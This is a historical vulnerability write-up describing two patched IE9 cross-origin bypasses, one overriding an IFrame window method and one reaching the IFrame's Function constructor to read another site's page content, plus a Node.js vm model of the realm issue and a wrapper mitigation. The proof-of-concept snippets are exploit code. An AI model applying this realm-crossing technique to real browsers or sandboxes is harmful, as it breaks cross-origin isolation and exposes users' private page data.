Two related techniques for reading cross-origin document content in IE9. The first overrode a method on a cross-origin IFrame’s window before the victim page called it; the second obtained a live Function constructor from a cross-origin method reference and used it to execute code in that context.

Method 1 — Override a Cross-Origin Window Method

// iFrMethods refers to the IFrame's window. Installing the override requires
// same-origin access to the IFrame first; the victim page later calls focus itself.
iFrMethods.focus = function() {
    alert(document.URL); // Runs in the IFrame's context
};

Method 2 — Get Function Constructor from a Cross-Origin Method

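// iFrGoogle.focus is a window method readable cross-origin; its .constructor
// is the Function constructor of the IFrame's script engine.
var xFunction = iFrGoogle.focus.constructor;
xFunction(
    "alert(location + '\\n\\n' + document.body.innerText)"
)();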

Method 2 did not require same-origin setup. iFrGoogle.focus was accessible cross-origin (it was a window method), and its .constructor property resolved to the Function constructor of the IFrame’s script engine. Calling that constructor created a function that executed in the Google IFrame’s context, reading its page content.
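
The realm behaviour behind Method 2, as an added example that is not part of the original write-up: two Node.js vm contexts stand in for the embedding page and the IFrame, showing that a function object handed across realms carries its own realm's Function constructor, while a forwarding wrapper created in the caller's realm does not. The names rawFocus, safeFocus, the helper functions and the secret value are constructed for illustration, and vm contexts are used only as a model of separate script realms, not as a security boundary.

```javascript
// Added example: Node's vm contexts model the two script realms.
// All names and values below are constructed.
const vm = require('node:vm');

// "Victim" realm with its own globals, including a value the embedder must not read.
const victim = vm.createContext({ secret: 'victim-page-content' });

// A method object created inside that realm, analogous to the IFrame's focus.
const rawFocus = vm.runInContext('(function focus() {})', victim);

// Check: a function from another realm has a constructor that is not our Function.
function exposesForeignRealm(fn) {
  return fn.constructor !== Function;
}

// Code compiled by a realm's Function constructor resolves globals in that
// realm, so the result depends on which constructor fn exposes.
function readThroughConstructor(fn) {
  return fn.constructor('return typeof secret === "string" ? secret : null')();
}

// Mitigation: hand out a function created in the caller's realm that only
// forwards the call. Its constructor is the caller's own Function.
function wrapInCallerRealm(fn) {
  return function wrapped(...args) {
    fn.apply(undefined, args); // forward the call, return nothing realm-bound
  };
}

const safeFocus = wrapInCallerRealm(rawFocus);

function demo() {
  return {
    rawExposes: exposesForeignRealm(rawFocus),
    rawRead: readThroughConstructor(rawFocus),
    safeExposes: exposesForeignRealm(safeFocus),
    safeRead: readThroughConstructor(safeFocus),
  };
}

console.log(demo());
```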

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.